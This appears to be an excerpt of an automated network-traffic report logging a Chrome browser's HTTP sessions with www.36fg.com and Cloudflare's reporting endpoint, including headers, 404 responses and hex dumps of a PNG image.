                                                        Data Ascii: B@*a't+**t#j+013&N{!W]>lOw&#{DJIMw=rnyd"\F}:.4wO]9Rg2$ibBQM)Cu)_d>M`8*;Tu@)e!y^";WY)=Rsp=+n9&
                                                        2025-03-15 00:17:59 UTC1369INData Raw: 9d 75 7c 26 e1 39 47 c2 bb 22 0e d9 f7 ad 87 61 76 3c ae 56 5e 59 a8 e1 1f 3e 18 c4 bf 4d e4 69 cc bb 24 71 0f e1 cc e3 84 8b 7c c4 6a 04 ee f2 d3 fd de 39 74 d8 b1 70 23 b3 82 ca d5 d4 00 4b 2c a9 98 15 96 9b ef 37 14 dd 0b 3a 6f 7f e2 53 ef 3e c9 1d a0 10 17 aa 89 25 13 6d 3b c7 15 f8 86 2f f9 71 7a e9 51 09 e5 37 d8 3b cc 91 f6 66 11 3f 85 02 74 22 49 a0 73 27 13 78 da 04 2f 8d 9f a7 06 05 56 c2 73 2b 1b 75 c1 da e1 94 a4 89 53 a4 a8 37 04 4d 9f 51 88 f4 0a 9b d1 ce db de 04 68 ef 10 6d a6 2b cb 90 06 e7 1c d4 46 6e 9f 3f b6 7e 2e 1f 55 c2 d1 75 03 ab 00 30 d1 27 f2 eb 2a ea 09 51 ee d2 e5 6b ed 35 2b cb a4 eb ea 01 f3 bd 07 77 ae 9b f3 56 d9 2a a4 0a 0b 6f d3 a3 0c 61 03 67 2b 92 4f 68 1e 54 9c 61 e5 03 e8 0e 0e 7b 4d 21 19 63 e1 a1 5d d7 1f 10 79 12
                                                        Data Ascii: u|&9G"av<V^Y>Mi$q|j9tp#K,7:oS>%m;/qzQ7;f?t"Is'x/Vs+uS7MQhm+Fn?~.Uu0'*Qk5+wV*oag+OhTa{M!c]y
                                                        2025-03-15 00:17:59 UTC1369INData Raw: 64 20 15 5e e0 d0 71 d1 a3 ff 59 c1 6b af d1 6d d5 a4 eb 18 e7 2f 0b fa 9a 01 5d a8 fa 5d 8e 5d e3 a4 a0 5a b8 af 5a 84 cb 00 93 dc 37 af d9 13 d2 85 cf 5f 9c 3f be 28 f9 ce 1c 90 1e bb 84 0b e7 08 ff 77 ee 7c 04 7b 67 a6 e1 40 e3 0f fa 24 13 7e d0 6d 6f 28 90 3e e4 51 49 25 0f 9d b8 b0 7a eb 5d d9 ab b6 88 71 4f 01 06 8e 13 6e b3 72 e0 ab 84 d8 d0 3f b7 1a 42 5e 41 b9 be a3 0b eb 1f a7 bb 3d a9 40 dc 47 2a 56 5c 82 56 76 5b 08 d6 26 c7 2d c4 e7 06 83 f3 4b 07 b1 fd 4e d7 8d dc 1a fa d1 18 b6 89 57 17 6c 63 0f b9 c7 ac 5b e8 8a 48 2d 93 f7 b2 aa 15 a3 06 f6 8f 4d 8c 5b 39 fb 7a fa ae a7 d3 78 ac 91 61 83 ba 5b 0a f0 8d 5d 76 49 ea 25 2b 18 ba 49 35 96 8b c0 41 bb 24 12 3a 81 f9 15 b0 c6 3f 30 17 76 9c 47 14 ef 35 a9 ec ab 33 49 02 a7 1a 61 92 9d df 2c dd
                                                        Data Ascii: d ^qYkm/]]]ZZ7_?(w|{g@$~mo(>QI%z]qOnr?B^A=@G*V\Vv[&-KNWlc[H-M[9zxa[]vI%+I5A$:?0vG53Ia,
                                                        2025-03-15 00:17:59 UTC1369INData Raw: 19 d7 fa 39 a7 3d 68 05 36 cd 49 87 b4 b5 aa fb fd 9c ef f1 b3 46 81 d9 ef 42 c3 c4 28 4a 26 55 2c f1 1d c2 b0 95 64 e5 fd ba 5f 5f f1 5a 7f 89 d3 69 4f e5 56 19 6f 8f 26 83 f3 60 df 09 47 02 07 ed ab 01 5d 02 04 0e a1 04 d9 af 23 d7 c6 98 fb bc d8 b4 9d bb f5 a7 3b 22 25 7e 56 8a b1 26 e7 48 6e 51 41 f5 80 4a f9 0d 94 b3 c0 42 1f d3 7b f5 52 4d f0 2d 6d e6 eb 0d aa d6 1a 5f 1e 2a 7d fe cc 7e 01 cd cd 05 a3 8c 54 81 7a b7 1a 9b 33 a3 bb bb 87 9c c3 f8 74 72 44 fe 79 fa e7 13 ce 84 85 7e fe 8d 03 b5 e2 84 fb 57 2a a7 79 81 88 4c f4 ef 38 74 99 b0 04 c4 42 d7 af 0f ac 30 2a 76 49 8a 3d da 1e 47 98 0b 0e a0 ca 7f 84 ce 83 ca 28 c0 ac aa d6 49 05 89 78 09 2c 09 32 a9 73 cc 63 98 a0 2f ef 38 ce e6 ce 07 48 58 7d aa c6 5e e0 b4 aa 3f 08 0e ee 48 08 2e e1 b2 8d
                                                        Data Ascii: 9=h6IFB(J&U,d__ZiOVo&`G]#;"%~V&HnQAJB{RM-m_*}~Tz3trDy~W*yL8tB0*vI=G(Ix,2sc/8HX}^?H.
                                                        2025-03-15 00:17:59 UTC1369INData Raw: dc 53 d2 18 98 62 63 be 63 4f bf d8 a2 70 f6 49 fd c0 0b cc be 48 18 b6 0f 13 7f 8e 90 11 d3 c7 c1 b0 b7 7e cd 6d 67 f0 43 2c b4 72 c9 8f 0f bf 3f a5 40 83 02 fd c4 75 5b 67 f9 8c e3 e2 f6 df 11 45 00 76 6e ed f8 1f c0 cd f8 88 7f db f1 6f 8d 87 7a 3f 7a d8 64 d2 90 cb 37 df 02 9b 25 2b 24 71 72 68 4f fe 8b df 5f 24 3c c1 a1 60 ce 20 19 6c 62 12 e7 c8 11 35 48 7c 1e ca 25 d3 2d c4 15 af b9 b7 f8 bc ff a0 6d 2e 46 11 45 cb c1 dd 13 fa 9a 00 64 03 99 45 3a 53 4b ca 3f 14 08 f9 dc de e2 42 d7 1e 03 b0 bb 55 9f c9 1d ca c0 c7 da 7f 60 72 98 5e 1a 19 9f f8 e4 50 bb 29 f4 02 1a 53 92 f0 59 51 f6 39 b4 6d cd 0d 1d ba ba 65 62 56 48 a4 02 ca 9f 55 52 92 80 f2 a7 f7 0e a9 58 2f e7 6b 28 cd 95 07 9c 43 29 00 5b 01 be 9d 27 49 f0 44 16 90 14 1e 19 df 45 eb 64 c2 ac
                                                        Data Ascii: SbccOpIH~mgC,r?@u[gEvnoz?zd7%+$qrhO_$<` lb5H|%-m.FEdE:SK?BU`r^P)SYQ9mebVHURX/k(C)['IDEd


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        46192.168.2.549788104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:59 UTC684OUTGET /static/css/assets/img/footer/footer-bg.jpg HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://www.36fg.com/static/css/style.css
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:59 UTC813INHTTP/1.1 404 Not Found
                                                        Date: Sat, 15 Mar 2025 00:17:59 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=14400
                                                        CF-Cache-Status: EXPIRED
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=it%2F%2BEuGWuZEBBm5%2FOCaBBJ%2BsvMkTGFrcovrdmcZEtv9DDlb9gHQPdlh0k4RqbgTPgAu7qd%2Bm1%2FVs0mZgvyI2oLtgQMghmttlYGJ0CUK5UnHpYXrKmLJgdMxSac%2FyEdc%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4ba388b7611-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=2061&rtt_var=789&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1256&delivery_rate=1372825&cwnd=72&unsent_bytes=0&cid=359fa7659f534975&ts=410&x=0"
                                                        2025-03-15 00:17:59 UTC154INData Raw: 39 34 0d 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 0d 0a
                                                        Data Ascii: 94<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                        2025-03-15 00:17:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        47192.168.2.549789104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:59 UTC672OUTGET /static/fonts/top-arrow.svg HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://www.36fg.com/static/css/scrolltop.css
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:59 UTC803INHTTP/1.1 404 Not Found
                                                        Date: Sat, 15 Mar 2025 00:17:59 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=14400
                                                        CF-Cache-Status: EXPIRED
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2BbRbpd7JxMWsntsFcS1LepKvvWpTsZjxDUJ18nxEiwYfGqTQR0RVxV0a9b5fKBA5sLo%2BUCv0HwiJuridq6o6k2g7rYXlXISKHSiDgUhAB0xe2VbLySW2d3Gx6PTmmQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4babdb22223-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2058&min_rtt=2048&rtt_var=789&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1244&delivery_rate=1367681&cwnd=71&unsent_bytes=0&cid=96ea36216842854c&ts=345&x=0"
                                                        2025-03-15 00:17:59 UTC154INData Raw: 39 34 0d 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 0d 0a
                                                        Data Ascii: 94<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                        2025-03-15 00:17:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        48192.168.2.549792104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:18:00 UTC654OUTGET /favicon.ico HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:18:00 UTC810INHTTP/1.1 404 Not Found
                                                        Date: Sat, 15 Mar 2025 00:18:00 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=14400
                                                        CF-Cache-Status: EXPIRED
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sn%2BuihXpHrCKNPPhFfmwkmlKkZYlmLmSjmYzlcU%2FHQlMlVDaiQxjD0%2Ftu79X89u%2F5E2wBrolgpPaNIPIX2uuCpO%2FX5qOrnzap1cPg6kzDet9nm8KynMJ30oeeTTYkhY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4c0e8f815d7-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1677&rtt_var=637&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1226&delivery_rate=1705607&cwnd=212&unsent_bytes=0&cid=888d116d5930102e&ts=345&x=0"
                                                        2025-03-15 00:18:00 UTC154INData Raw: 39 34 0d 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 0d 0a
                                                        Data Ascii: 94<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                        2025-03-15 00:18:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        49192.168.2.54979135.190.80.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:18:00 UTC533OUTOPTIONS /report/v4?s=X%2BbRbpd7JxMWsntsFcS1LepKvvWpTsZjxDUJ18nxEiwYfGqTQR0RVxV0a9b5fKBA5sLo%2BUCv0HwiJuridq6o6k2g7rYXlXISKHSiDgUhAB0xe2VbLySW2d3Gx6PTmmQ%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Origin: https://www.36fg.com
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-15 00:18:00 UTC336INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-max-age: 86400
                                                        access-control-allow-methods: POST, OPTIONS
                                                        access-control-allow-origin: *
                                                        access-control-allow-headers: content-length, content-type
                                                        date: Sat, 15 Mar 2025 00:18:00 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        50192.168.2.549793104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:18:00 UTC450OUTGET /static/images/breadcrumb.png HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:18:00 UTC988INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:18:00 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 427076
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:36 GMT
                                                        etag: "60e7ae78-68444"
                                                        expires: Sun, 13 Apr 2025 11:46:47 GMT
                                                        Cache-Control: max-age=2592000
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 45078
                                                        Accept-Ranges: bytes
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YdtnjQgJ8PSkYMaPbwD7%2F3znRYdj1%2B%2BX6swJJOCNh8ux%2BT09CsCvYz9bDuNbnWK3a3LIsDRNT%2FhLlHFunlqx%2FuqkMPQTyR14CBSHCLFe4OoHLP0reQ7bI94Wgbn4w4g%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4c119d44244-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1660&rtt_var=633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1022&delivery_rate=1713615&cwnd=234&unsent_bytes=0&cid=5ad1fa5bcdbfff3b&ts=158&x=0"
                                                        2025-03-15 00:18:00 UTC381INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 80 00 00 02 7c 08 06 00 00 00 1f ca bc 03 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 76 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                        Data Ascii: PNGIHDR|tEXtSoftwareAdobe ImageReadyqe<viTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                        2025-03-15 00:18:00 UTC1369INData Raw: 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 6d 6d 2f 22 20 78 6d 6c 6e 73 3a 73 74 52 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 73 54 79 70 65 2f 52 65 73 6f 75 72 63 65 52 65 66 23 22 20 78 6d 6c 6e 73 3a 78 6d 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 20 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 63 61 61 63 62 34 37 33 2d 62 64 33 35 2d 32 33 34 61 2d 38 38 63 61 2d 31 38 30 34 62 66 33 33 32 31 64 34 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 37 35 33 37 44 36 42 33 46 42 45 30 31 31 45 39 38 45 39 30 45 30 31 44 37 45 44 38 42 37
                                                        Data Ascii: s.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4" xmpMM:DocumentID="xmp.did:7537D6B3FBE011E98E90E01D7ED8B7
                                                        2025-03-15 00:18:00 UTC1369INData Raw: 6b d3 cb a3 8c fa 8d 2f 8e 9b 7b fc c4 f0 eb 69 af 99 93 7e a6 0d ce e9 0a ef db 7d b9 f3 36 06 8b bd 84 71 eb b1 e6 f3 dd 7b 0e 2a fa 9f f1 24 90 ff 0d fb 85 d4 99 23 b1 c5 d6 d1 f6 08 c6 c5 11 eb b1 c7 fe 69 8d ba 63 3a 70 2e 1d 28 9e 2f 17 ea c5 83 f4 1e e2 64 4f a5 8e 91 c8 3a 9c 15 6b 6f 8b 0c c6 6b 89 71 24 f2 b3 85 cc 6c e1 2b 9a 28 57 b9 18 d8 a1 8e b2 27 d3 f5 17 68 a1 59 b8 c6 ac 7f 66 a0 e3 13 9f e6 ec dc e7 36 49 90 73 4d 54 c8 dc 79 10 8a 5b ce ea 06 89 f7 3d 9c de f9 bf 4f 1b d4 da 2f ff 79 7a e1 7f c3 7e 12 3f 6e ea b4 da fb ff 38 7d e7 ff d9 b8 ff 3a d9 fc df 5b d8 45 33 e6 d7 c9 46 eb c7 9e ee f3 7f 35 86 ff d5 18 b2 36 c6 ff b6 76 46 eb 87 db a4 41 ba 4e 3c 99 92 69 09 af 91 8c db da 30 ff c7 e9 e7 9f 8d 9f a7 d3 b8 e9 77 7b 66 ff 5f b6
                                                        Data Ascii: k/{i~}6q{*$#ic:p.(/dO:kokq$l+(W'hYf6IsMTy[=O/yz~?n8}:[E3F56vFAN<i0w{f_
                                                        2025-03-15 00:18:00 UTC1369INData Raw: 1d 29 44 03 3a b7 06 1c 14 52 fb 97 f1 5a d2 4d cb 78 ec 39 5e 75 7a bc 3a 6b 3c 64 6d c4 f1 46 f2 d7 75 ff a2 33 d7 98 cb 5d a0 63 96 9f 38 ee 45 3a b3 46 e7 be a0 66 a7 d8 79 dd 57 de 73 83 bf 97 2f cd d8 b0 8e df fc 4f 79 f8 03 8c 3c 1b d7 d7 ea 6c ae 60 27 5e 7a b4 06 67 e0 fd f4 3f 9b e6 64 c3 36 be e3 f3 e4 8b 90 4d 44 1e 7d 27 30 37 95 c7 21 85 33 84 4e e0 3d f9 24 b0 d5 89 2f d0 f1 27 1b bb f9 db 78 44 8c 20 2b b8 2b 51 43 61 19 e4 66 13 3b 23 68 c8 4a e8 84 c4 3b e4 96 ed 48 78 22 d8 12 be e3 d5 05 bb 20 d7 b8 fa aa e1 d9 1a 24 35 b7 e4 13 af f6 df cf 7e 3e c8 7e ff 2f 76 09 73 42 17 b0 9d 13 e2 79 da 9a fb 4e 78 63 62 e2 e4 1d 91 dc 9f 2b ef bb da 8e 24 6e bd 5d 77 6c a2 3d c3 79 6b 73 45 a3 55 4c 47 d9 b3 6f ea 56 cf 18 93 eb 20 67 3f 7f f2 47
                                                        Data Ascii: )D:RZMx9^uz:k<dmFu3]c8E:FfyWs/Oy<l`'^zg?d6MD}'07!3N=$/'xD ++QCaf;#hJ;Hx" $5~>~/vsByNxcb+$n]wl=yksEULGoV g?G
                                                        2025-03-15 00:18:00 UTC1369INData Raw: 4f bc fe 1b b0 88 3b 9c 3b a9 30 e5 65 e2 53 09 1f e2 50 d8 dc 84 d7 0a dd 9d 6b 0d f9 6c d0 65 85 64 b8 83 cd e5 c8 9b a6 ef 51 e5 b9 b2 b2 dd a2 43 57 a7 ea 32 dc 1a 01 19 4a 60 c0 a9 be 5c 11 e7 55 c3 3f 53 5d ee 18 ea 24 99 cd 6c 0f 88 f4 aa 86 35 51 c9 d9 89 77 e7 9e 00 1a 29 5e bf b0 8f ab 9e 96 ee f9 77 01 81 a4 cd 82 66 7e 1d 42 f5 8d 3a 90 3c 22 33 2f f6 d8 0a b2 c3 3a 9c 52 11 9f 1c 8b f2 bc 8c e9 c9 d7 d5 f1 71 ef f7 dd 61 1c e7 5c 6d 94 8a 4b f7 e3 89 37 28 75 bb d2 d0 ee 7c ae f8 00 23 b6 17 4f 39 60 5f c5 52 16 b9 82 2e 2a a7 7d b6 e0 9b 5d c3 96 fd 41 21 a9 40 8b 24 aa 28 8a 69 09 02 a1 03 d7 75 15 d8 ce be 9f 18 ec 1b 9f e5 6b b2 30 77 d2 29 13 20 07 45 bf 5e 8a 72 b0 b2 e9 25 40 f7 0b c9 03 9b 08 17 2e de bf 63 d2 ae fe c2 65 7a 19 48 26
                                                        Data Ascii: O;;0eSPkledQCW2J`\U?S]$l5Qw)^wf~B:<"3/:Rqa\mK7(u|#O9`_R.*}]A!@$(iuk0w) E^r%@.cezH&
                                                        2025-03-15 00:18:00 UTC1369INData Raw: 42 73 89 13 a6 8d 20 14 a6 c9 6c a4 09 c5 26 09 c4 32 fb 58 01 85 4e 5a 74 b9 8f 64 bb 29 d1 cb 6a 5a 26 06 af 76 40 9e 24 d3 65 d0 e2 fc 81 28 a5 c8 a1 2c 54 02 8e 61 41 47 24 6d 13 88 6d 7f d1 81 a5 28 bf f4 67 5b e8 28 f8 e4 32 ee 3e b6 a4 51 94 39 92 18 6f 8d 2a d8 2f 20 b1 65 49 f2 fe ef e0 38 57 01 1a 1b bc ee 6b 0a 36 a7 83 3b 9e 52 38 00 e3 d7 7d 0b 8a 85 dc 4b 2b 35 ef 49 31 43 29 96 72 e6 f6 1a 71 45 e6 65 45 91 be 6c ee c9 0f 31 74 df bd ec 6c fb 0d e2 65 26 47 4f 9a 9d 26 2f ae 11 f3 e7 49 b2 a5 e9 9c 7a 9f ec 1b 25 7d e9 ac ef 75 1b 1a 8c f9 9a b3 77 5b da ba 58 32 33 71 3e 6e 9b 03 58 55 dd 06 ed c7 26 92 d9 3f 2b 4f 74 6f 22 47 5d 08 36 7c e5 a6 fd 3f a8 9e a3 e4 41 1d 94 d3 f0 68 62 77 11 99 58 9d 8b f5 24 ba cd 83 78 bf ee 57 55 89 3e 35
                                                        Data Ascii: Bs l&2XNZtd)jZ&v@$e(,TaAG$mm(g[(2>Q9o*/ eI8Wk6;R8}K+5I1C)rqEeEl1tle&GO&/Iz%}uw[X23q>nXU&?+Oto"G]6|?AhbwX$xWU>5
